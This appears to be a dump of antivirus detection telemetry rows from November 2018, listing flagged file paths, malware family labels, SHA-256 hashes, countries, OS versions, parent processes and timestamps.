  Row(detection=Row(filename='snailmail.exe', filepath='G:\\ألعاب\\Removable Disk\\Removable Disk\\t\\SnailMail.exe', filesize=3072000, name='W32/Virut.Gen.#M1.#R1'), hash='8e8e9ad3cdd5bc9aa6ff06062ff8e884d6a03f31c08e84df1743eb9415135347', metadata=Row(cmdline='\\\\\\/flags:0x0', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\LogonUI.exe', parentsize=10752, timestamp='2018-11-02T15:56:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='snailmail.exe', filepath='G:\\ألعاب\\Removable Disk\\Removable Disk\\t\\SnailMail.exe', filesize=3072000, name='W32/Virut.Gen.#M1.#R1'), hash='8e8e9ad3cdd5bc9aa6ff06062ff8e884d6a03f31c08e84df1743eb9415135347', metadata=Row(cmdline='\\\\\\/flags:0x0', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\LogonUI.exe', parentsize=10752, timestamp='2018-11-02T11:48:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='snailmail.exe', filepath='G:\\ألعاب\\Removable Disk\\Removable Disk\\t\\SnailMail.exe', filesize=3072000, name='W32/Virut.Gen.#M1.#R1'), hash='8e8e9ad3cdd5bc9aa6ff06062ff8e884d6a03f31c08e84df1743eb9415135347', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T22:15:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='snailmail.exe', filepath='G:\\ألعاب\\Removable Disk\\Removable Disk\\t\\SnailMail.exe', filesize=3072000, name='W32/Virut.Gen.#M1.#R1'), hash='8e8e9ad3cdd5bc9aa6ff06062ff8e884d6a03f31c08e84df1743eb9415135347', metadata=Row(cmdline='\\\\\\/flags:0x0', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\LogonUI.exe', parentsize=10752, timestamp='2018-11-02T18:01:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='snailmail.exe', filepath='G:\\ألعاب\\Removable Disk\\Removable Disk\\t\\SnailMail.exe', filesize=3072000, name='W32/Virut.Gen.#M1.#R1'), hash='8e8e9ad3cdd5bc9aa6ff06062ff8e884d6a03f31c08e84df1743eb9415135347', metadata=Row(cmdline='\\\\\\/flags:0x0', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\LogonUI.exe', parentsize=10752, timestamp='2018-11-02T00:55:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='casino autobot.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\rar$exa3264.2345\\casino autobot.exe', filesize=1280000, name='HEUR/APC.#M1.#R1'), hash='8eb2120570a10c18f117cdecc28c116186c0048d02882053ca3bd93e38dcfdf0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=2233800, timestamp='2018-11-02T16:35:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='casino autobot.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa6564.24695\\Casino AutoBot.exe', filesize=1280000, name='HEUR/APC.#M1.#R1'), hash='8eb2120570a10c18f117cdecc28c116186c0048d02882053ca3bd93e38dcfdf0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:15:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8f0b5617e5fa994482faf617e7d5495d00674f7d8e92d1cdc31196e287c4e2f7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8F0B5617E5FA994482FAF617E7D5495D00674F7D8E92D1CDC31196E287C4E2F7', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8f0b5617e5fa994482faf617e7d5495d00674f7d8e92d1cdc31196e287c4e2f7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:23:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8f0b5617e5fa994482faf617e7d5495d00674f7d8e92d1cdc31196e287c4e2f7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8F0B5617E5FA994482FAF617E7D5495D00674F7D8E92D1CDC31196E287C4E2F7', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8f0b5617e5fa994482faf617e7d5495d00674f7d8e92d1cdc31196e287c4e2f7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:00:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8f0b5617e5fa994482faf617e7d5495d00674f7d8e92d1cdc31196e287c4e2f7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8F0B5617E5FA994482FAF617E7D5495D00674F7D8E92D1CDC31196E287C4E2F7', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8f0b5617e5fa994482faf617e7d5495d00674f7d8e92d1cdc31196e287c4e2f7', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:19:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='typeperf.exe', filepath='H:\\TẤT CẢ\\KHONG DUOC XOA\\O C\\WINDOWS\\system32\\dllcache\\typeperf.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='8f63e8ba8689541d8e7bc877eb771756fee5f3920f876f63b18b5638ef15a55e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2501368, timestamp='2018-11-02T10:37:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8fe8e6c2e3049b61a5dcec440d458b7a20bf0fad78258ec6aca728f3735ec365', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8FE8E6C2E3049B61A5DCEC440D458B7A20BF0FAD78258EC6ACA728F3735EC365', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8fe8e6c2e3049b61a5dcec440d458b7a20bf0fad78258ec6aca728f3735ec365', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:00:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8fe8e6c2e3049b61a5dcec440d458b7a20bf0fad78258ec6aca728f3735ec365', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8FE8E6C2E3049B61A5DCEC440D458B7A20BF0FAD78258EC6ACA728F3735EC365', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8fe8e6c2e3049b61a5dcec440d458b7a20bf0fad78258ec6aca728f3735ec365', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:19:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8fe8e6c2e3049b61a5dcec440d458b7a20bf0fad78258ec6aca728f3735ec365', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8FE8E6C2E3049B61A5DCEC440D458B7A20BF0FAD78258EC6ACA728F3735EC365', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8fe8e6c2e3049b61a5dcec440d458b7a20bf0fad78258ec6aca728f3735ec365', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:23:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msiql.exe', filepath='\\\\?\\C:\\ProgramData\\msiql.exe', filesize=1920000, name='HEUR/AGEN.1027953.#M1.#R1'), hash='90344389f8755d99916fd079cef7e23e7f913126c777a1ff58a52e534bb76a17', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:10:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msiql.exe', filepath='\\\\?\\C:\\ProgramData\\msiql.exe', filesize=1920000, name='HEUR/AGEN.1027953.#M1.#R1'), hash='90344389f8755d99916fd079cef7e23e7f913126c777a1ff58a52e534bb76a17', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:09:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp17rg51d5', filepath='/tmp/tmp17rg51d5', filesize=13016000, name='Android/FakeApp.CH.Gen.#M14.#R501708'), hash='903456810c791b0f0e1c33edeb0add3ada6d607f912c25c8f736fbcdef064ae9', metadata=Row(cmdline=None, country='US', os_name='Linux', os_vmajor='8', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:34:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='\\\\?\\C:\\Program Files (x86)\\InstallShield Installation Information\\{18443A58-1497-11D6-9C37-0002A51A160C}\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='904ef6cebeaf0e9872460b8d7637e040e0b38cf93d8cbf3a28cc423fef722303', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:49:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='c:\\program files (x86)\\installshield installation information\\{18443a58-1497-11d6-9c37-0002a51a160c}\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='904ef6cebeaf0e9872460b8d7637e040e0b38cf93d8cbf3a28cc423fef722303', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:49:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pinball.exe', filepath='C:\\Program Files\\Windows NT\\Pinball\\pinball.exe', filesize=320000, name='W32/Alman.BB.#M1.#R1'), hash='90517d9420032bfd0268eea46cf94e1a635ea19343388f33814d064db19a4610', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:45:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ultimatedefrag.exe', filepath='C:\\Users\\X\\Desktop\\Hirens 7\\HBCD\\Programs\\UltimateDefrag.exe', filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline='\\\\\\/Install \\\\\\/Update \\\\\\/Quiet  \\\\\\/InstallFile \\\\\\"C:\\\\\\\\$WINDOWS.~BT\\\\\\\\Sources\\\\\\\\Install.esd\\\\\\" \\\\\\/progressCLSID 06cfe2c4-1c5b-4002-bca2-d0667fe5b626 \\\\\\/ReportId {C3BD4254-41A1-4918-A51A-1C74251DF7F3}.201 \\\\\\"\\\\\\/ClientId\\\\\\" \\\\\\"1eeffbbd-5a32-4a02-af22-5323b7db6150\\\\\\" \\\\\\"\\\\\\/CorrelationVector\\\\\\" \\\\\\"pR8P7z\\\\\\/JgEW3X9Vd.5.1.2\\\\\\" \\\\\\/WUCachedFileName \\\\\\"17134.1.180410-1804.rs4_release_CLIENTCONSUMER_RET_x86FRE_en-us.esd\\\\\\"', country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\$WINDOWS.~BT\\Sources\\SetupHost.exe', parentsize=697528, timestamp='2018-11-02T20:27:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102029-a2f61c72', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-102029-A2F61C72', filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:20:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ultimatedefrag.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\UltimateDefrag.exe", filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:17:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221558-637dba7c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221558-637DBA7C', filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221522-5e23f410', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221427-55CFC5F3\\AVSCAN-20181102-221522-5E23F410', filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-222108-92570a54', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221829-7A5CEC69\\AVSCAN-20181102-222108-92570A54', filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:21:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ultimatedefrag.exe', filepath='H:\\HBCD\\Programs\\ULTIMATEDEFRAG.EXE', filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T22:11:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221428-55da95e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221428-55DA95E3', filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:14:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221609-652b0593', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221609-652B0593', filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:16:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083206-bc50ebfd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-082729-98D810FE\\AVSCAN-20181102-083206-BC50EBFD', filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ultimatedefrag.exe', filepath='E:\\HBCD\\Programs\\UltimateDefrag.exe', filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:21:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jetupdate.exe', filepath='C:\\Program Files\\JetAudio\\jetUpdate.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='90864d19d2b2cf26f03973e34c494eafe5889ec522117388f064ec8614bf3c3f', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T13:09:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jetupdate.exe', filepath='C:\\Program Files\\JetAudio\\jetUpdate.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='90864d19d2b2cf26f03973e34c494eafe5889ec522117388f064ec8614bf3c3f', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T20:36:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jetupdate.exe', filepath='C:\\Program Files\\JetAudio\\jetUpdate.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='90864d19d2b2cf26f03973e34c494eafe5889ec522117388f064ec8614bf3c3f', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T18:34:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060303-50f7ede0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-060303-50F7EDE0', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='90c5f259076e65dbf393768136994f850806d08b149624dfc931e5c31416837c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:05:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ozpipi[1].gif', filepath='\\?\\C:\\Documents and Settings\\X\\Local Settings\\Temporary Internet Files\\Content.IE5\\K3Q9A7UV\\ozpipi[1].gif', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ldxewd[1].bmp', filepath='\\?\\C:\\Documents and Settings\\X\\Local Settings\\Temporary Internet Files\\Content.IE5\\S31YTB02\\ldxewd[1].bmp', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='patch.exe', filepath='H:\\org mmak\\org\\org 2014\\yessssss net\\2014\\InterNet Download Manger 2014\\ArabSeeD.CoM.IDM.6.18.b7.AhMeD00FaWzY\\Internet Download Manager 6.18 Build 7 Retail\\Crack 2\\Patch.exe', filesize=64000, name='TR/Dropper.Gen.#M300.#R1748'), hash='915ab88f04e7d2f0055d60f2c76284852abf31ac7f57d96c87a72b33b68cc46f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T16:40:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-184214-f3edc94f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d5657254\\AVSCAN-20181102-184045-E440E557\\AVSCAN-20181102-184214-F3EDC94F', filesize=64000, name='TR/Dropper.Gen.#M1.#R1'), hash='915ab88f04e7d2f0055d60f2c76284852abf31ac7f57d96c87a72b33b68cc46f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:42:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ptedit32.exe', filepath='I:\\BACKUPs--125GB\\Program Files\\Symantec\\Norton PartitionMagic 8.0\\RESCUEME\\DOSYSTEM\\PTEDIT32.EXE', filesize=512000, name='TR/Patched.Gen.#M300.#R2947'), hash='92370f2470ec2deb9200739fabb4edb783634d53a052710893053be98703ea24', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe12_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe12 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T01:03:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ptedit32.exe', filepath='I:\\BACKUPs--125GB\\Program Files\\Symantec\\Norton PartitionMagic 8.0\\RESCUEME\\DOSYSTEM\\PTEDIT32.EXE', filesize=512000, name='TR/Patched.Gen.#M300.#R2947'), hash='92370f2470ec2deb9200739fabb4edb783634d53a052710893053be98703ea24', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T20:22:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ptedit32.exe', filepath='\\\\?\\I:\\BACKUPs--125GB\\Program Files\\Symantec\\Norton PartitionMagic 8.0\\RESCUEME\\DOSYSTEM\\PTEDIT32.EXE', filesize=512000, name='TR/Patched.Gen.#M300.#R2947'), hash='92370f2470ec2deb9200739fabb4edb783634d53a052710893053be98703ea24', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:32:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ptedit32.exe', filepath='I:\\BACKUPs--125GB\\Program Files\\Symantec\\Norton PartitionMagic 8.0\\RESCUEME\\DOSYSTEM\\PTEDIT32.EXE', filesize=512000, name='TR/Patched.Gen.#M300.#R2947'), hash='92370f2470ec2deb9200739fabb4edb783634d53a052710893053be98703ea24', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe21_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe21 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T04:03:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smartbar.communication.dll.vir', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\C\\Users\\Mélanie\\AppData\\Local\\LPT\\Smartbar.Communication.dll.vir', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='92772b5d19769307d8f8765d639ee23d14c178cb14e8578f7255e56d41d4de58', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:01:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T00:48:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T08:30:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T02:48:47Z'), dt=datetime.date(2018, 11, 2)),
